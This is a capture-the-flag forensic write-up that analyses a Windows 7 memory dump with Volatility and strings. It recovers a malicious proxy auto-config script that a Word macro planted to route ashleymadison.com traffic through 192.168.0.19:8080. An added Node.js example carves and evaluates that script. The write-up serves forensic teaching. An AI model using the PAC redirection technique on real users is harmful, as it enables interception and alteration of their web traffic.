Root-me.org

Malicious Word Macro

PAC

We get another memory dump for this one. The challenge statement says that the victim opened an interesting Word file and that his favorite website has not been working since.

It sounds like some kind of VBA macro modified the hosts file, or maybe set up a redirection?

The title is also a hint: PAC stands for Proxy Auto-Configuration. A PAC file is a small JavaScript file that defines a function FindProxyForURL(url, host); the browser calls it for every request, and its return value ("DIRECT" or "PROXY host:port") decides whether the request goes straight to the site or through a particular proxy. That makes it a quiet way to hijack traffic to chosen sites, so this should be the biggest hint.

Let’s start by finding the OS version.

vol.py -f memory.dmp imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/p0pp3t/CTF/rootme/forensic/ch20/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x185000L
                          KDBG : 0x82953c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82954c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-11-11 16:14:49 UTC+0000
     Image local date and time : 2016-11-11 17:14:49 +0100

Windows 7 again; we'll use Win7SP1x86_23418 as the profile. Let's see the processes.

vol.py --profile=Win7SP1x86_23418 -f memory.dmp pslist | grep WORD
Volatility Foundation Volatility Framework 2.6
0x84d24490 WINWORD.EXE            3248    816     13      434      1      0 2016-11-11 16:14:05 UTC+0000                                 

Before anything else, let's check whether the dump contains the function name FindProxyForURL, using strings. Note that strings only prints 7-bit ASCII runs by default; had the script been held in memory as UTF-16LE, as Windows often stores strings, this search would have missed it.

strings memory.dmp | grep "FindProxyForURL"
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)
function FindProxyForURL(url, host)

We can see it a bunch of times. Let's look at what's before and after those lines.

strings memory.dmp | grep "FindProxyForURL" -B 3 -A 3
function FindProxyForURL(url, host)
	if (shExpMatch(url,"*.ashleymadison.com/*"))
		return "PROXY 192.168.0.19:8080";
    return "DIRECT";
function FindProxyForURL(url, host)
	if (shExpMatch(url,"*.ashleymadison.com/*"))
		return "PROXY 192.168.0.19:8080";
    return "DIRECT";
...
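As an added example (not part of the original writeup), the following Node.js script does both steps above programmatically: it carves every copy of the PAC function out of a constructed stand-in for memory.dmp (including a UTF-16LE copy, which plain strings would miss) and then evaluates the recovered FindProxyForURL the way a browser would, using a reimplementation of the PAC helper shExpMatch. The dump bytes, the test URLs and the helper names (buildSampleDump, carvePacScripts, loadPac, route) are constructed for illustration; the script text is the one recovered above, with the lone "{" and "}" lines restored, since strings drops runs shorter than four characters and so did not print them.

```javascript
// Added example, not part of the original writeup: carve PAC scripts out of
// a raw memory image and evaluate the recovered FindProxyForURL as a browser
// would. The dump contents are constructed; the script text is the one
// recovered from the real dump above (lone brace lines restored).

const RECOVERED_PAC =
  'function FindProxyForURL(url, host)\r\n' +
  '{\r\n' +
  '\tif (shExpMatch(url,"*.ashleymadison.com/*"))\r\n' +
  '\t\treturn "PROXY 192.168.0.19:8080";\r\n' +
  '    return "DIRECT";\r\n' +
  '}\r\n';

// Constructed stand-in for memory.dmp: the script appears twice as ASCII and
// once as UTF-16LE (the encoding Windows often keeps strings in), among junk.
function buildSampleDump() {
  const junk = Buffer.from([0x00, 0x00, 0x41, 0x42, 0xff, 0x00, 0x90, 0x90]);
  return Buffer.concat([
    junk, Buffer.from(RECOVERED_PAC, 'latin1'),
    junk, Buffer.from(RECOVERED_PAC, 'utf16le'),
    junk, Buffer.from(RECOVERED_PAC, 'latin1'),
    junk,
  ]);
}

const SIGNATURE = 'function FindProxyForURL';

// Return the text from its start up to the brace that closes the function,
// or null when the window ends before the body is complete.
function extractFunction(text) {
  let depth = 0;
  for (let i = 0; i < text.length; i++) {
    if (text[i] === '{') depth++;
    else if (text[i] === '}' && depth > 0 && --depth === 0) {
      return text.slice(0, i + 1);
    }
  }
  return null;
}

// Locate every occurrence of the signature in both encodings and return the
// distinct function bodies (line endings normalised so copies de-duplicate).
function carvePacScripts(dump, window = 4096) {
  const found = new Set();
  for (const enc of ['latin1', 'utf16le']) {
    let pos = dump.indexOf(SIGNATURE, 0, enc);
    while (pos !== -1) {
      const text = dump.toString(enc, pos, Math.min(dump.length, pos + window));
      const body = extractFunction(text);
      if (body) found.add(body.replace(/\r\n/g, '\n'));
      pos = dump.indexOf(SIGNATURE, pos + Buffer.byteLength(SIGNATURE, enc), enc);
    }
  }
  return [...found];
}

// PAC helper shExpMatch: a shell-style glob where '*' matches any run of
// characters and '?' exactly one; everything else is literal.
function shExpMatch(str, shexp) {
  const re = [...shexp].map(c =>
    c === '*' ? '.*' : c === '?' ? '.' : c.replace(/[.+^${}()|\[\]\\]/g, '\\$&')
  ).join('');
  return new RegExp('^' + re + '$').test(str);
}

// Instantiate the carved script with only shExpMatch in scope. This still
// executes attacker-controlled code: run it on a disposable analysis VM.
function loadPac(pacText) {
  return new Function('shExpMatch', pacText + '\nreturn FindProxyForURL;')(shExpMatch);
}

// Browsers normalise the URL (e.g. add the trailing "/") before the call.
function route(findProxyForURL, rawUrl) {
  const u = new URL(rawUrl);
  return findProxyForURL(u.href, u.hostname);
}

// Stand-alone run over the constructed dump.
function demo() {
  const scripts = carvePacScripts(buildSampleDump());
  console.log(`${scripts.length} distinct PAC script(s) carved`);
  const findProxyForURL = loadPac(scripts[0]);
  for (const url of ['http://www.ashleymadison.com', 'https://www.ashleymadison.com/login',
                     'http://ashleymadison.com/', 'http://www.root-me.org/']) {
    console.log(url, '->', route(findProxyForURL, url));
  }
}
demo();
```

Every request to www.ashleymadison.com, over http or https, is sent to 192.168.0.19:8080, where whoever controls that host can read, alter or simply drop it; if nothing useful is listening there, the site just stops loading, which matches the symptom in the statement. Two details worth noticing: the bare domain without a subdomain slips past the pattern because it requires a "." before ashleymadison.com, and modern Chrome strips the path and query from https URLs before calling FindProxyForURL, but the trailing "/" survives, so this rule still fires for https.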

Well, that was a little underwhelming…